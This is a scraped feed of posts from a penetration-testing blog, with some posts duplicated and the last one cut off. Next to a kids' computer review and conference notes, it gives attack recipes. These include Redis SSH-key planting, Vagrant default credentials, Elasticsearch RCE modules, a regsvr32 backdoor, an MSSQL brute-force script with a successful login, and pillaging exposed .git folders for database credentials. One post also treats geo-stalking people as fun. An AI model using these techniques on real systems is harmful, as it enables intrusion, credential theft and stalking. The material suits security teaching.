http://hackedexistence.com/downloads/Cloud_Security_in_Map_Reduce.pdf

https://media.blackhat.com/bh-us-10/presentations/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-slides.pdf

https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf

https://github.com/CERT-W/hadoop-attack-library

https://www.sans.org/score/checklists/cloudera-security-hardening

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

http://www.cloudera.com/documentation/enterprise/latest/topics/cdh_ig_ports_cdh5.html

What did I miss? Anything to add?

Tags: devoops
May 29, 2017
15:25
Raspbian/Kano OS in QEMU
» ‎ Carnal0wnage

Quick notes

I wanted to be able to boot the Kano OS in a virtual machine so i could play hack minecraft with the kids and play along with the Kano OS desktop/games. I was trying to avoid plugging a raspberry pi into an monitor to use and wanted to use it on my local laptop.

Well, not so easy. VirtualBox/VMware dont support ARM. However QEMU does.

This repo (https://github.com/dhruvvyas90/qemu-rpi-kernel/wiki/Emulating-Jessie-image-with-4.x.xx-kernel) had the recent raspberry pi kernels to use with QEMU.

If you follow the steps on that page with regards to mounting the image and editing /etc/ld.so.preload and /etc/fstab I was able to get the image to boot up successfully...slow as hell...but it technically was working.

command to boot with vnc:
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f5f5f5; background-color: #000000} span.s1 {font-variant-ligatures: no-common-ligatures}
$ qemu-system-arm -vnc :1 -kernel qemu-rpi-kernel/kernel-qemu-4.4.34-jessie -cpu arm1176 -m 256 -M versatilepb -append "root=/dev/sda2 rootfstype=ext4 rw" -hda Kanux-Beta-v3.9.0-Lovelace-jessie-rc-2017-03-23_04-48.imgOS with vnc:

I was so horribly slow i don't think this is feasible. I am going to try using libvirt to make it better or just see if i can play hack minecraft another way. If I get anywhere further with the project i'll post an update.

Tags: hack minecraft
March 29, 2017
20:15
InsomniaHack Trip Report
» ‎ Carnal0wnage
Insomni'Hack Info:
https://insomnihack.ch/

Favorite talks
Bridging the gap between ICS(IoT?) and corporate IT security
Stefan Lüders

I really enjoyed this talk hearing how an organization defends in a BYOD & academic environment. Defense is difficult when you control the hosts, even more so when you you cant instrument the host and have to rely on network controls only.

My favorite slide was their alerting stack:

Not sure when the slides will be released but here is an older version of the talk I found:
https://www.blackhat.com/docs/us-14/materials/us-14-Luders-Why-Control-System-Cyber-Security-Sucks.pdf

How we hacked Distributed Configuration Management Systems
Francis Alexander & Bharadwaj Machiraj

Awesome talk on breaking into
- HashiCorp Consul
- Apache Zookeeper
- CoreOS etcd
Tool they created:
https://github.com/torque59/Garfield

Modern reconnaissance phase on APT – protection layer
Paul Rascagnères

Fun talk on how APT have been implementing some checks to make sure the targets are valid prior to sending down the final stage of the attack.

CERN
@cktricky and I also were able to give the talk at CERN. Background info on CERN: https://en.wikipedia.org/wiki/CERN

Archive of the talk:

Cool Pix:
Dropping Knowledge

Synchrocyclotronhttps://en.wikipedia.org/wiki/Synchrocyclotron

Outside the Antimatter Factory
Thanks Twitter :-)

Tags:
January 21, 2017
12:32
Kano review
» ‎ Carnal0wnage

Below is a quick review of the Kano computer.

WTF is it?
The kano computer is a raspberry pi based computer that is meant for kids to put together and build themselves. Looks a bit like this:

propaganda video:

It ships with a nice guide that most kids will be able to follow to get the piece of the Kano computer up and running. Optionally you can also buy a screen kit where everything can fit all together in a tidy package. The screen kit that houses the raspberry pi and and keyboard is the reason I went with the Kano over just piecing one together for the kids.

Once you get the hardware set up, the KanoOS walks you thru setting up a user account and starts off in story mode where you start off on SD beach and get to explore your computer in a RPG type environment.

You also have menu for kids where they can pick what they want to work on but also has a classic button if you want to get to a more normal Linux experience.

Not shown in the screenshot but definitely present in the menu now is a link to Scratch which this kids love. And of course no computer for kids cant not ship without Minecraft:

The OS is designed to get the kids to go through various quests to learn about the computer and as you complete quests more open up to you. More info around this is available on the Kano developer blog: http://developers.kano.me/2016/08/03/kano-os-beta-v340-released/
The Kano OS is available here: http://developers.kano.me/downloads/ if you want to throw it in a VM or raspberry pi you have around the house. It is also open source so you can contribute: https://github.com/KanoComputing
The Kano world portal also has fun stuff https://world.kano.me/projects
As an added bonus Kano has been sending emails for the kids to experiment with stuff.

This week's "Secrets of the Computer Kit" included an introduction to the Linux terminal and cowsay!
cowsay, with some Scratch on the other Kano

The kids also got their first real Linux experience by the screen flipping and it still being flipped after a reboot. We eventually found an option in the menu to flip it back but it was a nice introduction to the hell that is running Linux...good times. Enjoy Linux hell boys I'll be here to help you
Overall extremely pleased.
Two negative experiences though:
One was the first upgrade process. It took over 30 minutes to download all the updates. I ended up losing the kids for the nite during that process due to it taking so long.
Second was the fact the computers showed up one day and the monitors the next!? WTF. I realize Kano doesn't have control of all things shipping but it was a real PITA to have computers and no monitors. Suggestion: bundle kits should ship together.
Aside from the above, the kids have been enjoying their new computers.

I know it's coming so i'll just address it here: 250 bucks for a raspberry pi?! Yeah kinda steep...but I did price something comparable out before I bought. Here is what I came up with:
https://www.adafruit.com/products/2718 Pi Foundation Display - 7" Touchscreen Display for Raspberry Pi $79.95
https://www.adafruit.com/products/2033 Pimoroni Raspberry Pi 7" Touchscreen Display Case - Noir $14.95
https://www.adafruit.com/products/2253 Pi Model B+ / Pi 2 / Pi 3 Case Base - Clear $5.00 LID 3.00
SD CARD 32 GB various $10-$20
https://www.adafruit.com/products/2876 Full Size Wireless Keyboard with Trackpad $39.95
https://www.arrow.com/en/products/raspberrypi3/raspberry-pi-foundation RASPBERRY PI3 $35.00
OR
https://www.adafruit.com/products/3055 Raspberry PI3 $39.95
Speaker: ?? 10?
Misc cables to hook it al up ?? 20?
Total ~ $180
or
https://www.adafruit.com/products/3116 Pi-Top - GREY - A Laptop Kit for Raspberry Pi B+ / Pi 2 / Pi 3 $274.95
None of the above with the exception of the Pi-Top fit nicely together, I'd end up having build it for the kids and I wanted them to build it themselves. Plus the Kano comes in fun colors with stickers so they can make it their own. I'm satisfied with the purchase but you could technically do it for the price of a raspberry pi and SD card if you have the other gear laying around.
In a similar vein is the Piper computer if you are considering things for kids:https://www.buildpiper.com/pages/piper-computer-kit
You can also download the piper OS image here: http://community.playpiper.com/t/how-to-download-install-the-piper-sd-card-image/311/4

Tags: kanoOS kano computers
January 18, 2017
4:18
DevOoops: In-Memory Databases (Redis) Part 2
» ‎ Carnal0wnage

Doing part 2 first as the altcoin mining stuff is interesting with the mongoDB/elasticsearch ransomware stuff currently going on.

A redis developer dropped an interesting piece of info here

http://antirez.com/news/96

Namely:
“However, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”

He goes on to show how someone could echo over SSH keys and use the config command to write them to the appropriate place if you have permissions. He used a key name of "crackit" so I thought I'd see how prevalent it was....I checked a few and saw it a good chunk of them.

go go shodan

I did find something interesting while looking thru some open redis boxes. I found:

A cron job? running a shell script. Can you do that from Redis???

What's in the shell script?!

alt coin mining! sweeeeeet.

I had no idea what an XMR is but I wanted to see how this person was doing with the money making. Thankfully you can just query the payouts for any XMR address. So I did:

They've made around $20,000 USD in BTC. I guess crime does pay :-)

To satisfy my curiosity started a miner up on a linode and was getting around 60 H/s. This person is cranking out 70 KH/s, so they have a few boxes working for them.

Extending the idea that a good hack yields plenty more I stumbled across this gem. https://phpinfo.me/2016/07/07/1275.html with several different ways to get code exec on redis.

I created some gists from the previous link in case the post disappears.

-CG-

Tags: devoops
January 16, 2017
5:00
DevOoops: Client Provisioning (Vagrant)
» ‎ Carnal0wnage

Notes from the 2015 Devoops Talk

Vagrant used to ship with a default keypair and was difficult to rotate.

**fixed with new versions of Vagrant. Finding hosts using the default key still pretty likely.

Did you change your SSH keys?

Default Credentials
root/vagrant vagrant/vagrant
No pass to sudo :-)

Scanning for the default key using metasploit (ssh_login_pubkey module)

Identify real from fake by ssh version scan

Log in with private key

Tags: devoops
January 13, 2017
5:00
DevOoops: Client Provisioning (Kickstart Files)
» ‎ Carnal0wnage

Notes from the 2015 Devoops talk. Posting it so i can remove it from the slide deck but still refer to it. Also relevant from a common problems with devops theme.

Kickstart Files

3 ways to set root password

1. Enter during installation

2. Crypted hash in the kickstart file
“rootpw --iscrypted”

3. Clear text in the kickstart file
“rootpw --plaintext”

Examples

Kickstart Files Takeaways

Don't leave these files in open shares

Use the crypted password option for files

Have a process to change the password after initialization

Rotate the initial root password regularly

Tags: devoops
January 12, 2017
5:00
DevOoops: Client Provisioning (Chef)
» ‎ Carnal0wnage

Notes on Chef from the 2015 Devoops Talk. Posting it so i can remove it from the slide deck but still refer to it. Also relevant from a common problems with devops theme.

Chef allows you to define the state your servers (local or cloud) should be in and enforces it.

Web Interface

Environment Leakage

databags

knife is a Chef command line utility. The credentials are stored in data bags. Credentials can be encrypted.

Example:

$ knife data bag list

Chef/knife (encrypted data bag)

Chef/knife with path to secret file

Chef Takeaways

Be aware of what you put into chef recipes

Protect secrets/passwords

Info on securing chef: https://learn.chef.io/skills/be-a-secure-chef/
Tags: chef
January 11, 2017
18:25
DevOoops: Elasticsearch
» ‎ Carnal0wnage

Notes from the Devoops talk on Elastic Search

Elasticsearch Provides a distributed, multitenant-capable full-text search engine with a RESTful web interface and schema-free JSON documents.

GET request to port 9200 will show version
"version" : {"number" : "1.2.4"

No Authentication (initially)

Can search stored data via HTTP API

Update data with PUT request

Join an open cluster and receive all data

RCE prior to 1.2.0 (CVE-2014-3120)
RCE prior to 1.5.0* (CVE-2015-1427)

exploit/multi/elasticsearch/script_mvel_rce

Kibana
Searching via curl/browser is cumbersome...Kibana FTWhttp://www.elasticsearch.org/overview/kibana/
Edit config.js to point to open Elasticsearch
Open index.html in local browser or host on a server

Viewing the content of the document

Import your own data and visualize

Elasticsearch solutions:
Apply authentication if possible-->https://www.elastic.co/products/shield
Segment elasticsearch from Corp (and the public in general)
Be aware of the data you put in elasticsearch-->anyone can search it
Logs Logs Logs
osquery
https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for-ransom

http://code972.com/blog/2017/01/107-dont-be-ransacked-securing-your-elasticsearch-cluster-properly

Tags: devoops
August 13, 2016
16:48
Exporting workspaces from your MSF database
» ‎ Carnal0wnage

Quick and dirty hack to export all your findings/host/services/etc and creds from your metasploit database

Normally you'd do this with a:

workspace myworkspace
db_export -f xml -a /path/to/file.xml
db_export -f pwdump -a /path/to/file.pwdump

This can be tedious if you want to spin down an instance with tons of workspaces on it. So I wrote a quick resource script to get it done. This takes a list of workspaces. I'm sure you can programmatically retrieve the workspaces but I didn't. Code below:

Tags: metasploit
May 10, 2016
19:42
Subtee regsvr32 sct with metasploit web delivery
» ‎ Carnal0wnage

So I put this out on twitter but failed to document it for historical reasons/find it when I need it.

I was able to replace the PoC payload with the payload from Metasploit's web delivery and it worked just fine.

original PoC here: https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302#file-backdoor-sct

Below we can see the replaced payload:

...and receiving the shell after running the command from the command line:

Tags: metasploit
March 21, 2016
6:00
More on Purple Teaming
» ‎ Carnal0wnage

I wanted to add a bit more context/info/explanation on Purple Teaming after publishing the Ruxcon slides as well as Facebook and Twitter interactions on that topic.

What is Purple Teaming?

Currently, there are as many definitions for Purple Teaming as there are talks and blog posts on the subject but I'm going to throw mine in as well.

Purple Teaming is "conducting focused pentesting (up to Red Teaming) with clear training objectives for the Blue Team."

The clear training objectives (aka a plan to eventually get caught) for the Blue Team is what differentiates Purple Teaming from typical Red Teaming. By its very nature, Red Teaming is making a HUGE attempt not to get caught. You are pulling out all the tips & tricks and big boy tools NOT to get caught. With Purple Teaming, you have a plan to create an alert or event in the event the Red Team is not detected by the Blue Team during the Red Team process so the Blue Team can test their signatures and alerting and execute their incident response policies and procedures.

It isn't a "can you get access to X" exercise it is a "train the Blue Team on X" exercise. The pentesting activities are a means to conduct realistic training.

A couple practical examples:

The Blue Team has created alerts to identify Sysinternals PsExec usage in the enterprise. The Red Team would at some point use PsExec to see if alerts fire off and the Blue Team can determine which hosts were accessed or pivoted from using PsExec. The Red Team could also make use of all the PsExec alternatives (winexe, msf psexec, impacket, etc) so the Blue Team could continue to refine and improve their monitoring and alerting.

Another scenario would be where the Blue Team manager feels like the team has a good handle on the Windows side of things but less so on the OSX/Linux side of the house. The manager could dictate to the Red Team that they should stay off Windows Infrastructure to identify gaps in host instrumentation and network coverage for *nix types hosts and also to force incident response on OSX or Linux hosts.

Another example could be to require the Red Team not to utilize freely available Remote Access Trojans such as Metasploit or powershell Empire. Instead they could ask that the Red Team purchase (or identify a consultancy that already uses) something like Core Impact or Immunity's Innuendo or find a consultancy that has their own custom backdoor to spice things up.

Thoughts?

Other Purple Teaming resources (in no particular order):

http://www.slideshare.net/beltface/hybrid-talk
http://www.slideshare.net/HaydnJohnson/purple-view-56169114
http://www.slideshare.net/denimgroup/b-sides-san-antonio-albert-campa-denim-group
http://www.slideshare.net/alienvault/security-by-collaboration-rethinking-red-teams-vs-blue-teams-cuispa-final-22015
https://files.sans.org/summit/hackfest2014/PDFs/Hacking%20to%20Get%20Caught%20-%20Raphael%20Mudge.pdf

Tags: blue teaming
January 02, 2014
6:00
Modern Day Gold Mining
» ‎ Carnal0wnage

Well maybe not Gold...but Litecoins, hobonickels, dodgecoins, and other kinds of *coins*

We've all heard about Bitcoins (BTC) and all wish we had bought a few hundred 2 years ago so we could retire today but who knew...

We'll its too late to get in the bitcoin game due to the difficultiy of mining one being super high but thankfully 60+ alternate crypto currencies have sprung up and thanks to sites like www.cryptsy.com you can now trade those alternate currencies for BTC.

want to know what to mine? you can check out http://www.coinwarz.com/cryptocurrency or http://www.coinarmy.com/

Punch in the numbers for your SHA256/scrypt cracking ability and get an idea what to mine to make the most $$$ the fastest. so if you can do 300 KH/s (average cheap GPU)

in 166 days you can make one Bitcoin (BTC) mining Netcoins and exchanging them at current rate where it would take more like 2000 days to make a Bitcoin.

OMG its raining money! sort of.

anyway its neat. seems like a good reason to set up a build a hash cracker, write it off for security stuff, and have it mining when its not busy converting hashes into plaintext.

Couple articles on it:

http://motherboard.vice.com/blog/beyond-bitcoin-a-guide-to-the-most-promising-cryptocurrencies
http://www.zdnet.com/a-crypto-currency-primer-bitcoin-vs-litecoin-7000024301/
http://alunacrypto.blogspot.ca/2013/12/a-new-wave-of-2nd-generation.html

Solo Mining vs Pools
http://bitcoin.stackexchange.com/questions/11471/what-are-the-advantages-and-disadvantages-of-pooled-mining
http://www.devtome.com/doku.php?id=mining_pools_vs_solo_mining

Hardware comparison to get an idea what numbers to put into those crunchers.

https://litecoin.info/Mining_hardware_comparison

You can even buy a 6 graphic card motherboard for mining, stock trading or making everyone (well your geek homies) jealous

happy cracking/mining

P.S.
From a hacker shit perspective... i cant image the mining pool software is very good. its probably worth taking a look at it. :-)

Tags:

January 03, 2013
6:00
MSSQL Brute forcing with Resource Scripts
» ‎ carnal0wnage.attackresearch.com

Problem:
How can we brute force MSSQL servers that listen on several different ports without having to manually change the RPORT?

*MSF Pro/Express handle this for you using the database.

Possible Solution:

Use a resource script to populate the values for us.

This will work but we have to get the data in there.

1. Set up the database for metasploit

2. Get a list of servers

OSQL -L

Servers:
SEVERNAME1\SQL2000
SEVERNAME2\SQL2005

OSQL will give you a list of hostnames, we need to turn these hostnames into IP addresses/ranges for mssql_ping.

You can use post/windows/recon/resolve_hostname to a list of hostnames and turn these into IP addresses.

msf post(resolve_hostname) > run

[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed

with a list of IP addresses...do mssql_ping

msf auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+] InstanceName = MSSQLSERVER
[+] IsClustered = No
[+] tcp = 1433
[+] np = \\servername1\pipe\sql\query
[+] Version = 8.00.194
[+] ServerName = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+] InstanceName = INSTANCE1
[+] IsClustered = Yes
[+] tcp = 2261
[+] np = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+] Version = 10.50.1600.1
[+] ServerName = SEVERNAME2

Now we can pull tcp ports out using the db query use the resource script to set the RHOST and RPORT for you per entry. weeeeeee

the query:

begin
framework.db.services.each do |service|
if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' => service.host.address, 'port' => service.port}
end
end

We can use that query to populate stuff on the fly for us.

example:

[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'

RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed

code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb

lots of other resource scripts are in the scripts/resources directory in your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource

UPDATE 4 Jan 2013:
merged into metasploit trunk
https://github.com/rapid7/metasploit-framework/pull/1234

Tags:

6:00
MSSQL Brute forcing with Resource Scripts
» ‎ Carnal0wnage

Problem:
How can we brute force MSSQL servers that listen on several different ports without having to manually change the RPORT?

*MSF Pro/Express handle this for you using the database.

Possible Solution:

Use a resource script to populate the values for us.

This will work but we have to get the data in there.

1. Set up the database for metasploit

2. Get a list of servers

OSQL -L

Servers:
SEVERNAME1\SQL2000
SEVERNAME2\SQL2005

OSQL will give you a list of hostnames, we need to turn these hostnames into IP addresses/ranges for mssql_ping.

You can use post/windows/recon/resolve_hostname to a list of hostnames and turn these into IP addresses.

msf post(resolve_hostname) > run

[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed

with a list of IP addresses...do mssql_ping

msf auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+] InstanceName = MSSQLSERVER
[+] IsClustered = No
[+] tcp = 1433
[+] np = \\servername1\pipe\sql\query
[+] Version = 8.00.194
[+] ServerName = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+] InstanceName = INSTANCE1
[+] IsClustered = Yes
[+] tcp = 2261
[+] np = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+] Version = 10.50.1600.1
[+] ServerName = SEVERNAME2

Now we can pull tcp ports out using the db query use the resource script to set the RHOST and RPORT for you per entry. weeeeeee

the query:

begin
framework.db.services.each do |service|
if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' => service.host.address, 'port' => service.port}
end
end

We can use that query to populate stuff on the fly for us.

example:

[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'

RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed

code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb

lots of other resource scripts are in the scripts/resources directory in your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource

UPDATE 4 Jan 2013:
merged into metasploit trunk
https://github.com/rapid7/metasploit-framework/pull/1234

Tags: brute-force nbsp-nbsp-nbsp-nbsp-nbsp rport mssql_ping

November 06, 2012
5:30
Geo-stalking with Bing Maps and the Twitter Maps App
» ‎ carnal0wnage.attackresearch.com

Geo/Social stalking is fun. Bing maps has the ability to add various "apps" to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.

Let's start with somewhere fun, like the pentagon, and see who's tweeting around there

Once you have your places picked out, you can click on the Map Apps tab.

If you click on the twitter maps app, it loads recent geo-tagged tweets

As you zoom in, you get a bit more detail

You can also follow specific users and follow them around town :-)

thanks to indi303 for telling me about this

-CG
Tags:

5:30
Geo-stalking with Bing Maps and the Twitter Maps App
» ‎ Carnal0wnage

Geo/Social stalking is fun. Bing maps has the ability to add various "apps" to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.

Let's start with somewhere fun, like the pentagon, and see who's tweeting around there

Once you have your places picked out, you can click on the Map Apps tab.

If you click on the twitter maps app, it loads recent geo-tagged tweets

As you zoom in, you get a bit more detail

You can also follow specific users and follow them around town :-)

thanks to indi303 for telling me about this

-CG
Tags: twitter fun app bing-maps bing apps-tab maps Pentesting

October 22, 2012
6:00
.git you some with DVCS-Pillage
» ‎ carnal0wnage.attackresearch.com

Ron over at SkullSecurity put out a post on Using "Git Clone" to get Pwn3D

Worth a read if you havent. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.

unfortunately(?) I dont run into this too often. What i do see is the presence of the /.git/ folder sometimes the config or index files it there but certainly no way to know what's in the object folders (where the good stuff lives)[or so i thought].

So i posed the following to twitter

to which i got two great replies.

The first one pointed me to:
https://github.com/evilpacket/DVCS-Pillage
(thanks Kos)

and the second was a shortcut to using the tool by the author (thanks Adam)

DVCS is pretty handy. With it you can pillage accessible GIT, GS and BZR repos. Similar functionality for svn already exists in metasploit

Does it work? yes mostly...an example:

user@ubuntu:~/pentest/DVCS-Pillage$ ./gitpillage.sh www.site.com/.git/
Initialized empty Git repository in /home/user/pentest/DVCS-Pillage/www.site.com/.git/ Getting refs/heads/master Getting objects/ef/72174d7a5d893XXXXXXXXXXXXXXXXXXXX Getting index Getting .gitignore curl: (22) The requested URL returned error: 404 About to make 245 requests to www.site.com; This could take a while Do you want to continue? (y/n)y Getting objects/01/f0d130adf04d66XXXXXXXXXXXXXXXX9e4ddb41 Getting objects/49/403ecc2d8a343da9XXXXXXXXXXXXXXX3f094d9 Getting objects/d3/1195ab0e695f8b89XXXXXXXXXXXXXXXXXa3af5 Getting objects/f9/b926f07XXXXXXXXXXXXXXXXXXXX567cf438c6a Getting objects/57/78a12e2edebXXXXXXXXXXXXXXXXXXX3f3a0e8d ---snip--- trying to checkout files error: git checkout-index: unable to read sha1 file of wp-register.php (caad4f2b21c37bXXXXXXXXXXXXXXX81c7949ec4f74e) #### Potentially Interesting Files #### wp-admin/export.php - [CHECKED OUT] wp-admin/includes/export.php - [CHECKED OUT] wp-admin/setup-config.php - [CHECKED OUT] wp-config-sample.php - [CHECKED OUT] wp-config.php - [CHECKED OUT] wp-settings.php - [CHECKED OUT]

anything useful in there?

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php /** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information b y * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'site_wordpress'); /** MySQL database username */ define('DB_USER', 'site_wp'); /** MySQL database password */ define('DB_PASSWORD', 'XXXXXXXX');
another way to turn a low to pwned :-)
Tags:

6:00
.git you some with DVCS-Pillage
» ‎ Carnal0wnage

Ron over at SkullSecurity put out a post on Using "Git Clone" to get Pwn3D

Worth a read if you havent. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.

unfortunately(?) I dont run into this too often. What i do see is the presence of the /.git/ folder sometimes the config or index files it there but certainly no way to know what's in the object folders (where the good stuff lives)[or so i thought].

So i posed the following to twitter

to which i got two great replies.

The first one pointed me to:
https://github.com/evilpacket/DVCS-Pillage
(thanks Kos)

and the second was a shortcut to using the tool by the author (thanks Adam)

DVCS is pretty handy. With it you can pillage accessible GIT, GS and BZR repos. Similar functionality for svn already exists in metasploit

Does it work? yes mostly...an example:

user@ubuntu:~/pentest/DVCS-Pillage$ ./gitpillage.sh www.site.com/.git/
